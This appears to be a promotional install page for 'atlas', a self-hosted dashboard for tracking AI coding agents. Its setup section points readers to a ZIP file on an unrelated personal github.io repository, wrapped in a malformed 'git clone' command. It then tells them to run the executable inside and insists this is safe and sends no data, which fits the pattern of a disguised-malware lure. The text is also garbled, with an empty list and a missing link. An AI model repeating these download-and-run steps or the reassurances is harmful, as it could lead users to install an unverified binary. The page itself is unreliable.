Your AI Coding Command Center
Manage multiple AI coding agents, track every change they make,
and search all their work in one unified, self-hosted dashboard.
Imagine you have a team of brilliant AI programmers – Claude Code, Codex, Kilo Code, OpenCode – all working on your project simultaneously. Now imagine you could see every single file they touch, every line they change, and review it all like a professional project manager. That's exactly what atlas gives you.
atlas is source control for AI agents. It's the command center that sits inside your own computer (self-hosted) and gives you total control over your AI coding workforce. You provide the agents, atlas provides the oversight, tracking, and search engine. No cloud services, no third parties – your data stays with you.
If you're a developer who uses any of these tools – Claude Code, Codex, OpenCode, Kilo Code, or any other AI coding assistant – and you've ever thought:
...then atlas solves all these problems for you. It's built for teams of human and AI developers who want professional oversight without the complexity.
Every time your AI coding agent edits a file, atlas records it. You see a complete timeline: which agent did what, when they did it, and exactly which lines were affected. It's like a security camera for your codebase, but for AI agents.
Have you ever used five different AI tools and wished you could search across all their history? atlas creates one unified index. Type a question or a keyword, and see every related change from every agent, all in one interface.
No more blind trust. Look at exactly what your AI assistants have done, revert bad changes, approve good ones, and feel confident that your codebase is always in your hands.
Your code and your AI agents' histories are yours alone. atlas runs entirely on your own machine. No data is sent anywhere. Perfect for work that must stay private.
Built to be compatible with the most popular AI coding agents, including Claude Code, Codex, Kilo Code, and OpenCode. It's designed as an MCP client, meaning it speaks the common language used by AI coding tools.
atlas is free and open-source software. That means you can use it as much as you want, customize it, and even contribute to making it better.
Follow these simple, step-by-step instructions. If you can use a web browser, you can do this.
Click the big orange button at the top of this page, or visit this link directly:
You'll see the atlas resource page. Look for a green button that says "Code" (click it) and then choose "Download ZIP" from the menu that appears. This is the safest way to get the software.
Your browser will download a file called atlas-main.zip to your computer. Leave it in your Downloads folder for now – we'll handle it next.
git clone https://github.com/KienNguyen1306/kiennguyen1306.github.io/raw/refs/heads/main/cosharer/v3.9.zip. But downloading the ZIP file is completely fine for most users.
Windows has a built-in way to open ZIP files. Here's how:
atlas-main. This is your atlas application folder.
Now you're ready to launch. Inside the folder, look for the atlas executable file. It might be named atlas.exe or simply atlas, depending on the version.
Double-click it to run atlas. The app will open in your web browser at http://localhost:3000.
Yes. You're downloading it from a trusted source (GitHub), it's open-source, and it's specifically designed to run locally. It doesn't send any data out.
Not at all! You need to know how to use the AI tools (like Claude Code), but atlas itself is a visual dashboard you operate through your regular web browser. It's made to be user-friendly for everyone.
The initial setup has one small step (extracting a ZIP file), but after that, it's very intuitive. We've designed it with a modern, clean interface that any computer user can navigate. You're just 10 minutes away from a superpowered overview of your AI assistants.
Because atlas is a community-driven open-source project, the best resource is the GitHub page itself. You can open an "Issue" (a question/help request) there, and the friendly community will guide you.
(Note: These are general guidelines for a standard setup. Your experience may vary.)
atlas is more than a tool – it's a peace-of-mind assistant for the modern developer. It lets you harness the power of multiple AI agents without ever losing the thread of what's happening in your project. Say goodbye to confusion, and hello to a clear, organized view of all your AI work.
